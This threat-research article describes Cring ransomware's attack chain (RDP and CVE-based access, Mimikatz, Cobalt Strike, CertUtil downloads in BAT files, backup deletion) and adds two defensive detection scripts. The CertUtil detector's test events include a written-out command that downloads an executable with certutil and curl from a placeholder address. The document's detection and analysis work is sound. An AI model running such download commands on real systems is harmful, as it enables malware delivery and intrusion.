Examining the Cring Ransomware Techniques
Sr. Threat Research Engineer

Here is a more detailed description of this chain:

Initial Access

The Cring ransomware gains initial access either through unsecure or compromised RDP or valid accounts.

The ransomware can also get into the system through certain vulnerability exploits. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).
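The report attributes initial access to unsecured or compromised RDP and valid accounts. The following detection logic is an added example written for this article, not code from the report or its authors; it runs over constructed Windows logon events (4624 success, 4625 failure) and flags two patterns a defender would want to see: an RDP logon (logon type 10) that follows a burst of failures from the same source address, and an RDP logon from an address outside the organisation's own networks. The internal ranges, the failure threshold and the time window are assumptions and would be tuned per environment.

```python
"""Detect suspicious RDP logons from Windows Security events.

Added example, not part of the original report. Event fields are a
simplified view of 4624/4625; INTERNAL_NETS, FAIL_THRESHOLD and WINDOW are
assumed values to be tuned per environment.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed corporate address space; anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
FAIL_THRESHOLD = 5            # assumed: failures before a success that we consider guessing
WINDOW = timedelta(minutes=10)  # assumed: look-back window for those failures
RDP_LOGON_TYPE = 10            # RemoteInteractive in 4624/4625


@dataclass
class LogonEvent:
    ts: datetime
    event_id: int   # 4624 = success, 4625 = failure
    logon_type: int
    user: str
    src_ip: str


def is_internal(ip):
    """True when the address falls inside one of the assumed internal networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_rdp_access(events):
    """Return (user, src_ip, rule) tuples for RDP logons worth reviewing."""
    findings = []
    failures = defaultdict(list)  # src_ip -> timestamps of failed logons
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.event_id == 4625:
            # Failures are counted regardless of logon type: with NLA enabled,
            # failed RDP attempts are commonly recorded as network (type 3) logons.
            failures[ev.src_ip].append(ev.ts)
            continue
        if ev.event_id != 4624 or ev.logon_type != RDP_LOGON_TYPE:
            continue
        recent = [t for t in failures[ev.src_ip] if ev.ts - t <= WINDOW]
        if len(recent) >= FAIL_THRESHOLD:
            findings.append((ev.user, ev.src_ip, "rdp-success-after-password-guessing"))
        elif not is_internal(ev.src_ip):
            findings.append((ev.user, ev.src_ip, "rdp-logon-from-external-address"))
    return findings


# Constructed sample events. Hostnames, users and the RFC 5737 documentation
# addresses (198.51.100.7, 203.0.113.5, 203.0.113.9) are made up.
_BASE = datetime(2021, 9, 1, 8, 0, 0)
SAMPLE_EVENTS = (
    # six failures in six minutes, then a success: password guessing
    [LogonEvent(_BASE + timedelta(minutes=i), 4625, 3, "admin", "198.51.100.7") for i in range(6)]
    + [LogonEvent(_BASE + timedelta(minutes=7), 4624, 10, "admin", "198.51.100.7")]
    # clean RDP logon from the assumed internal range: no finding
    + [LogonEvent(_BASE + timedelta(minutes=9), 4624, 10, "svc_backup", "10.1.2.3")]
    # clean RDP logon from outside the internal ranges: flagged as external
    + [LogonEvent(_BASE + timedelta(minutes=12), 4624, 10, "jdoe", "203.0.113.5")]
    # interactive (type 2) logon is not RDP: ignored
    + [LogonEvent(_BASE + timedelta(minutes=13), 4624, 2, "jdoe", "203.0.113.9")]
)

if __name__ == "__main__":
    for finding in detect_rdp_access(SAMPLE_EVENTS):
        print(finding)
```

Both rules key on the source address, so an environment that terminates RDP behind a gateway or VPN concentrator would need to substitute the original client address from the gateway's own logs.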

Credential Access

Threat actors behind Cring used weaponized tools in their attacks. One of these tools is Mimikatz, which was used to steal account credentials of users who had previously logged into the system.

Lateral Movement and Defense Evasion

Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that were later used for various purposes, including impairing the system's defenses.

Command and Control and Execution

Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server.

BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. The BAT files also use the Windows CertUtil program to help with the said download.
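Because the report describes BAT files calling CertUtil to fetch the ransomware, the CertUtil-as-downloader pattern is a useful thing to alert on. The following is an added example written for this article, not code from the report or its authors: it scans constructed process-creation events (field names modelled on Sysmon Event ID 1 / Windows 4688, which is an assumption) for certutil.exe invoked with a URL-fetching switch and an http(s) URL, and records whether a batch script (cmd.exe parent) launched it.

```python
"""Flag CertUtil used as a downloader in process-creation telemetry.

Added example, not part of the original report. The event layout is an
assumption; -urlcache and -verifyctl are documented certutil switches that
fetch a URL, and everything else (hosts, paths, addresses) is constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# certutil switches that cause it to retrieve a remote URL
DOWNLOAD_SWITCHES = {"-urlcache", "-verifyctl"}


def _switches(command_line):
    """Collect command-line switches, normalising '/UrlCache' and '-urlcache' to one form."""
    out = set()
    for tok in command_line.split():
        if tok[:1] in ("-", "/"):
            out.add("-" + tok[1:].lower())
    return out


def is_certutil_download(ev):
    """True when certutil.exe runs with a URL-fetching switch and an http(s) URL."""
    if ev.image.lower().rsplit("\\", 1)[-1] != "certutil.exe":
        return False
    return bool(_switches(ev.command_line) & DOWNLOAD_SWITCHES) and bool(
        URL_RE.search(ev.command_line)
    )


def analyze(events):
    """Return one finding per CertUtil download, noting whether a batch script launched it."""
    findings = []
    for ev in events:
        if not is_certutil_download(ev):
            continue
        findings.append({
            "host": ev.host,
            "url": URL_RE.search(ev.command_line).group(0),
            # BAT files run under cmd.exe, so a cmd.exe parent matches the chain in the report
            "from_batch_script": ev.parent_image.lower().endswith("cmd.exe"),
            "rule": "certutil-url-download",
        })
    return findings


# Constructed sample events; 198.51.100.7 is an RFC 5737 documentation address.
SAMPLE_EVENTS = [
    # certutil fetching a remote file from a batch script: should be flagged
    ProcessEvent("WS-FINANCE-01", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/update.exe C:\Users\Public\update.exe"),
    # legitimate certutil use (file hashing): no URL switch, not flagged
    ProcessEvent("WS-FINANCE-01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Users\alice\report.pdf SHA256"),
    # a download by another tool is out of scope for this rule
    ProcessEvent("WS-FINANCE-02", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\curl.exe",
                 r"curl.exe -o C:\Temp\x.bin http://198.51.100.7/x.bin"),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Legitimate certificate-revocation checks can also invoke certutil with -urlcache, so in production this rule is usually paired with an allowlist of known CRL and OCSP hosts rather than used as a blanket block.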

Impact

Once Cring has been executed in the system, it disables services and processes that might hinder the ransomware’s encryption routine. The threat will also delete backup files and folders. This will make restoring the encrypted files difficult for the victim, thereby placing more pressure on them to pay the ransom.

The ransomware will then proceed with its encryption routine and delete itself using a BAT file.

Based on our data, most of the Cring ransomware detections for attempted attacks were observed in Europe and the Middle East and Africa (EMEA) region. There have also been incidents in the Latin American Region (LAR), Asia Pacific (APAC), and North America (NABU).

The affected countries in the said regions were Azerbaijan, Brazil, Italy, Mexico, Saudi Arabia, the United States, and Turkey. With regard to industries, detections affected the finance and transportation sectors. Indeed, ransomware has been consistently attacking critical industries, as we discuss in our midyear report.
